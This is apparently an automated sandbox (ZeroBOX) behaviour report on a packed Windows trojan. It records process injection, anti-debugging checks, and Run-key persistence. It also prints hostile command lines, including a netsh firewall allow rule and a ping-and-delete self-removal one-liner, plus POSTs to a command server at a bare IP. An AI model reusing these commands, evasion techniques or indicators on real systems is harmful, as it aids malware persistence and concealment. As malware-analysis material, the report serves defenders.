Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 22, 2023, 9:41 p.m.	July 22, 2023, 9:46 p.m.

Size	100.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`1dc2580260eb3d20bf700457ce0f235c`
SHA256	`b9a1bcaaa0067b1e242d7e56024590b579143c170280d136a588f1b60e4fd02a`
CRC32	`A45247CF`
ssdeep	`3072:+Tnc3PcvClNcy5jUg8ov5ZsxTFEDk2b97:iogCV5ySkEDk2B7`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description)

payload.exe "C:\Users\test22\AppData\Local\Temp\payload.exe"
2560
- abgrcnq.exe C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe
  2676
  - cmd.exe /a /c netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe"
    2884
    - netsh.exe netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe"
      2944
  - abgrcnq.exe "C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe"
    3008
- cmd.exe /a /c ping 127.0.0.1 -n 3&del "C:\Users\test22\AppData\Local\Temp\payload.exe"
  2760
  - PING.EXE ping 127.0.0.1 -n 3
    2824

Name	Response	Post-Analysis Lookup
ns1.random.dns.d0wn.biz	A 178.17.170.133	178.17.170.133
ns1.any.dns.d0wn.biz
alors.deepdns.cryptostorm.net
ns.dotbit.me
onyx.deepdns.cryptostorm.net

IP Address	Status	Action
164.124.101.2	Active	Moloch
209.145.51.44	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.101:53850 -> 164.124.101.2:53	2027863	ET INFO Observed DNS Query to .biz TLD	Potentially Bad Traffic
UDP 192.168.56.101:58120 -> 164.124.101.2:53	2027863	ET INFO Observed DNS Query to .biz TLD	Potentially Bad Traffic
UDP 192.168.56.101:52797 -> 164.124.101.2:53	2027863	ET INFO Observed DNS Query to .biz TLD	Potentially Bad Traffic
UDP 192.168.56.101:55146 -> 164.124.101.2:53	2027863	ET INFO Observed DNS Query to .biz TLD	Potentially Bad Traffic
UDP 192.168.56.101:58297 -> 164.124.101.2:53	2027863	ET INFO Observed DNS Query to .biz TLD	Potentially Bad Traffic
UDP 192.168.56.101:58166 -> 164.124.101.2:53	2027863	ET INFO Observed DNS Query to .biz TLD	Potentially Bad Traffic
TCP 192.168.56.101:49171 -> 209.145.51.44:80	2018359	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 2	Potentially Bad Traffic
TCP 192.168.56.101:49173 -> 209.145.51.44:80	2018359	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 2	Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 209.145.51.44:80	2018359	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 2	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW July 22, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW July 22, 2023, 9:41 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (50 out of 90 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:41 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:42 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:42 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:42 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:42 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:42 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:42 p.m.			0	0
IsDebuggerPresent July 22, 2023, 9:42 p.m.			0	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 22, 2023, 9:41 p.m.		1	1	0

The executable uses a known packer (1 event)

packer

Armadillo v1.71

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header, HTTP version 1.0 used, Connection to IP address

suspicious_request

POST http://209.145.51.44/tef/tasks.php

Performs some HTTP requests (1 event)

request

POST http://209.145.51.44/tef/tasks.php

Sends data using the HTTP POST Method (1 event)

request

POST http://209.145.51.44/tef/tasks.php

A process attempted to delay the analysis task. (1 event)

description

abgrcnq.exe tried to sleep 264 seconds, actually delayed analysis time by 264 seconds

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\payload.exe

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (8 events)

Time & API	Arguments	Status	Return
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x000000c8 process_name: payload.exe process_identifier: 2560	1	1
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: inject-x86.exe process_identifier: 2700	1	1
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x000000c8 process_name: conhost.exe process_identifier: 2796	1	1
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x000000d0 process_name: PING.EXE process_identifier: 2824	1	1
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000118 process_name: abgrcnq.exe process_identifier: 3008	1	1
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000088 process_name: taskhost.exe process_identifier: 2452	1	1
Process32NextW July 22, 2023, 9:42 p.m.	snapshot_handle: 0x00000088 process_name: svchost.exe process_identifier: 2708	1	1
Process32NextW July 22, 2023, 9:42 p.m.	snapshot_handle: 0x00000118 process_name: WmiPrvSE.exe process_identifier: 1304	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00012e00', u'virtual_address': u'0x00008000', u'entropy': 7.773461538477486, u'name': u'.data', u'virtual_size': u'0x000130c4'}

entropy

7.77346153848

description

A section with a high entropy has been found

entropy

0.758793969849

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW July 22, 2023, 9:41 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 22, 2023, 9:41 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 22, 2023, 9:41 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Repeatedly searches for a not-found process, you may want to run a web browser during analysis (50 out of 873 events)

Time & API	Arguments	Status	Return	Repeated
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x000000c8 process_name: payload.exe process_identifier: 2560		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x000000c8 process_name: payload.exe process_identifier: 2560		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x000000c8 process_name: payload.exe process_identifier: 2560		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x000000c8 process_name: payload.exe process_identifier: 2560		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x000000c8 process_name: payload.exe process_identifier: 2560		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x000000c8 process_name: payload.exe process_identifier: 2560		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x000000c8 process_name: payload.exe process_identifier: 2560		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x000000c8 process_name: payload.exe process_identifier: 2560		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x000000c8 process_name: payload.exe process_identifier: 2560		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: is32bit.exe process_identifier: 2684		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: inject-x86.exe process_identifier: 2700		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0
Process32NextW July 22, 2023, 9:41 p.m.	snapshot_handle: 0x00000120 process_name: abgrcnq.exe process_identifier: 2676		0	0

Yara rule detected in process memory (9 events)

description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe"
cmdline	/a /c ping 127.0.0.1 -n 3&del "C:\Users\test22\AppData\Local\Temp\payload.exe"
cmdline	/a /c netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe"
cmdline	ping 127.0.0.1 -n 3

Communicates with host for which no DNS query was performed (1 event)

host

209.145.51.44

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory July 22, 2023, 9:41 p.m.	process_identifier: 3008 region_size: 114688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000110	1	0	0

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\abgrcnq.exe

reg_value

C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe

Operates on local firewall's policies and settings (2 events)

cmdline	netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe"
cmdline	/a /c netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe"

Executes one or more WMI queries (1 event)

wmi	SELECT * FROM AntiVirusProduct

Potential code injection by writing to the memory of another process (3 events)

Time & API	Arguments	Status	Return
WriteProcessMemory July 22, 2023, 9:41 p.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $R»tøÚ«Ú«Ú«¢«Ú«¢«Ú«þÅ«Ú«Æ«Ú«þÅ«Ú«¢«Ú«Ú«¾Ú«y¬µ«9Ú«y¬«Ú«RichÚ«PELÅèîWà ¢òt!À@À@Ò°4À0.text_ ¢ `.rdatarÀ¦@@.data<ÉàÄÄ@À.reloc<° @B base_address: 0x00400000 process_identifier: 3008 process_handle: 0x00000110	1	1
WriteProcessMemory July 22, 2023, 9:41 p.m.	buffer: À.1;1U1e1k1u1z1111¢1¬1´1¹1¿1Ê1Ñ1Ú1ù122!2+202W2i223o333©3À3Í3ê3ð34)4`4m44©4¶4½4Î4Ô4è45c5m5t5¢5²5å5ò56<6F6T6\|6666¡6Ò6ú78H88´8;©;Ù;à;û;1<?<U<<<=Í=×=]>g>>>¢>§>.?3?<? \|p1z11£1ª1±1¸1¾1Æ1Ì1Ó1Ú1å1ì1ò1ý1222+20252B2z22®2Î2Ô2Ú233ð3t444¡44¸4Ü4ã4æ5¦6ö67?88;â;?<x==>P>g>t>>>¸>00-0·0151=1E1\1d1j1o1{11111¢1¨1522¨2G3w33Ã3ð3ø35t55Í5ô5ü5&6;666ñ67Ó78!8»8á8ì89$9D9O9Ò;Û;<<<<&<-<4<C<\<<<=@P®4À4å45$5d5¦5¶566g66¶6¼6Q8º8Ï8:9999¨9²9·9Å9î9÷9:G:R:^::¡:S;_=2?P@12«2»2Ò2ã2ñ23u4Ï4Û4ç4ñ4$5355#6+6m6u6666À7Ù7 8,8]88¼8ê8û89.9@9N9V9[9`9k9p9u99999£9¨9):\::::³;Ù;õ;-<==Ç=S>{>>º>??´?`Ôg0°01!1(1v1}11¯1ë4>5566¢6¨6Á6ç6î6ô6 777'7/7A7t7{7777§77½7Ç7Í7Ý7ä7é7ò7888$8,8:8A8O8V8b8~89©9Â9w:þ:<;a;¥;Ö;Ý;<h<<<Ò<é<ò<:=l=}===¸=½=Ý=û=x>>>«>???"?)?0?7?>?E?L?S?Z?a?h?o?v?}??ø?ü?pð00000000 0$0(0,00040:0@0Z00ÿ011H1M1X1^1g1m1 1¥1·144#44/4N4h4 556À6Ð6í67:7?77ý78 8,878L8\8l8\|88£8ª8±8À8Ç8ñ8ø899 9+9B999:<:K:P:i:n:ã:ê:ó:;/;8;D;];n;v;;¸;¿;Æ;å;<<<y<<<Ã<Ê<ß<=È=è=>7>Q>}>Ã>È>Í>Ô>,?q?Ì?°Y0a0«0²0Ã0Ê0Þ0ì01'1112Ä2Ë2Ò2Ù2à2ç2î2õ2ü23 3333$4d4y44Ô45R5u5ü5}66Ô6;7Q7µ7þ748_8¶8»8Ï8æ8î8ü8w9:::!;(;Y;?<F<{<<<ó<ú<==©=°=>=>^>ó>??2?M?????²?è?=0C0W0`0p0}00¯0¸0ç0ì0>1~111¬12«52676I6N6[6l6z66 77±8½8ì8:$:Þ:è:ò:ü:;;;J;T;^;h;;®;´;Ã;Ê;¤<ñ<"={>¼>Ò>Ø>ç>î>î? :0k0Þ1í1ý12_2Ó2Ù2é2ð2^3 4G4]4ú4!5C5H5]5b5p5w55¢5å57=7d8ñ8999á9ê9ù9:e:Ê:Ñ:{;Ð;ã;<=n===¬=Ç=%><>E>f>>£>±>¶>Ê>]?° 0À42826 base_address: 0x0041b000 process_identifier: 3008 process_handle: 0x00000110	1	1
WriteProcessMemory July 22, 2023, 9:41 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3008 process_handle: 0x00000110	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory July 22, 2023, 9:41 p.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $R»tøÚ«Ú«Ú«¢«Ú«¢«Ú«þÅ«Ú«Æ«Ú«þÅ«Ú«¢«Ú«Ú«¾Ú«y¬µ«9Ú«y¬«Ú«RichÚ«PELÅèîWà ¢òt!À@À@Ò°4À0.text_ ¢ `.rdatarÀ¦@@.data<ÉàÄÄ@À.reloc<° @B base_address: 0x00400000 process_identifier: 3008 process_handle: 0x00000110	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2676 called NtSetContextThread to modify thread in remote process 3008
NtSetContextThread July 22, 2023, 9:41 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4202868 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000010c process_identifier: 3008	1	0	0

Attempts to remove evidence of file being downloaded from the Internet (1 event)

file	C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe:Zone.Identifier

Resumed a suspended thread in a remote process potentially indicative of process injection (5 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2676 resumed a thread in remote process 0
Process injection	Process 2676 resumed a thread in remote process 3008
NtResumeThread July 22, 2023, 9:41 p.m.	thread_handle: 0x00000000 suspend_count: 0 process_identifier: 0		3221225480	0
NtResumeThread July 22, 2023, 9:41 p.m.	thread_handle: 0xffffffff suspend_count: 0 process_identifier: 0		3221225477	0
NtResumeThread July 22, 2023, 9:41 p.m.	thread_handle: 0x0000010c suspend_count: 1 process_identifier: 3008	1	0	0

Attempts to modify Explorer settings to prevent hidden files from being displayed (2 events)

registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden

Executed a process and injected code into it, probably while unpacking (20 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW July 22, 2023, 9:41 p.m.	thread_identifier: 2680 thread_handle: 0x00000110 process_identifier: 2676 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000108	1	1
CreateProcessInternalW July 22, 2023, 9:41 p.m.	thread_identifier: 2764 thread_handle: 0x00000110 process_identifier: 2760 current_directory: filepath: C:\Windows\System32\cmd.exe track: 1 command_line: /a /c ping 127.0.0.1 -n 3&del "C:\Users\test22\AppData\Local\Temp\payload.exe" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 32 (NORMAL_PRIORITY_CLASS) inherit_handles: 1 process_handle: 0x00000108	1	1
CreateProcessInternalW July 22, 2023, 9:41 p.m.	thread_identifier: 2888 thread_handle: 0x000000d8 process_identifier: 2884 current_directory: filepath: C:\Windows\System32\cmd.exe track: 1 command_line: /a /c netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 32 (NORMAL_PRIORITY_CLASS) inherit_handles: 1 process_handle: 0x000000d0	1	1
NtResumeThread July 22, 2023, 9:41 p.m.	thread_handle: 0x00000000 suspend_count: 0 process_identifier: 0		3221225480
NtResumeThread July 22, 2023, 9:41 p.m.	thread_handle: 0xffffffff suspend_count: 0 process_identifier: 0		3221225477
CreateProcessInternalW July 22, 2023, 9:41 p.m.	thread_identifier: 3012 thread_handle: 0x0000010c process_identifier: 3008 current_directory: filepath: C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 1 process_handle: 0x00000110	1	1
NtGetContextThread July 22, 2023, 9:41 p.m.	thread_handle: 0x0000010c	1	0
NtAllocateVirtualMemory July 22, 2023, 9:41 p.m.	process_identifier: 3008 region_size: 114688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000110	1	0
WriteProcessMemory July 22, 2023, 9:41 p.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $R»tøÚ«Ú«Ú«¢«Ú«¢«Ú«þÅ«Ú«Æ«Ú«þÅ«Ú«¢«Ú«Ú«¾Ú«y¬µ«9Ú«y¬«Ú«RichÚ«PELÅèîWà ¢òt!À@À@Ò°4À0.text_ ¢ `.rdatarÀ¦@@.data<ÉàÄÄ@À.reloc<° @B base_address: 0x00400000 process_identifier: 3008 process_handle: 0x00000110	1	1
WriteProcessMemory July 22, 2023, 9:41 p.m.	buffer: base_address: 0x00401000 process_identifier: 3008 process_handle: 0x00000110	1	1
WriteProcessMemory July 22, 2023, 9:41 p.m.	buffer: base_address: 0x0040c000 process_identifier: 3008 process_handle: 0x00000110	1	1
WriteProcessMemory July 22, 2023, 9:41 p.m.	buffer: base_address: 0x0040e000 process_identifier: 3008 process_handle: 0x00000110	1	1
WriteProcessMemory July 22, 2023, 9:41 p.m.	buffer: À.1;1U1e1k1u1z1111¢1¬1´1¹1¿1Ê1Ñ1Ú1ù122!2+202W2i223o333©3À3Í3ê3ð34)4`4m44©4¶4½4Î4Ô4è45c5m5t5¢5²5å5ò56<6F6T6\|6666¡6Ò6ú78H88´8;©;Ù;à;û;1<?<U<<<=Í=×=]>g>>>¢>§>.?3?<? \|p1z11£1ª1±1¸1¾1Æ1Ì1Ó1Ú1å1ì1ò1ý1222+20252B2z22®2Î2Ô2Ú233ð3t444¡44¸4Ü4ã4æ5¦6ö67?88;â;?<x==>P>g>t>>>¸>00-0·0151=1E1\1d1j1o1{11111¢1¨1522¨2G3w33Ã3ð3ø35t55Í5ô5ü5&6;666ñ67Ó78!8»8á8ì89$9D9O9Ò;Û;<<<<&<-<4<C<\<<<=@P®4À4å45$5d5¦5¶566g66¶6¼6Q8º8Ï8:9999¨9²9·9Å9î9÷9:G:R:^::¡:S;_=2?P@12«2»2Ò2ã2ñ23u4Ï4Û4ç4ñ4$5355#6+6m6u6666À7Ù7 8,8]88¼8ê8û89.9@9N9V9[9`9k9p9u99999£9¨9):\::::³;Ù;õ;-<==Ç=S>{>>º>??´?`Ôg0°01!1(1v1}11¯1ë4>5566¢6¨6Á6ç6î6ô6 777'7/7A7t7{7777§77½7Ç7Í7Ý7ä7é7ò7888$8,8:8A8O8V8b8~89©9Â9w:þ:<;a;¥;Ö;Ý;<h<<<Ò<é<ò<:=l=}===¸=½=Ý=û=x>>>«>???"?)?0?7?>?E?L?S?Z?a?h?o?v?}??ø?ü?pð00000000 0$0(0,00040:0@0Z00ÿ011H1M1X1^1g1m1 1¥1·144#44/4N4h4 556À6Ð6í67:7?77ý78 8,878L8\8l8\|88£8ª8±8À8Ç8ñ8ø899 9+9B999:<:K:P:i:n:ã:ê:ó:;/;8;D;];n;v;;¸;¿;Æ;å;<<<y<<<Ã<Ê<ß<=È=è=>7>Q>}>Ã>È>Í>Ô>,?q?Ì?°Y0a0«0²0Ã0Ê0Þ0ì01'1112Ä2Ë2Ò2Ù2à2ç2î2õ2ü23 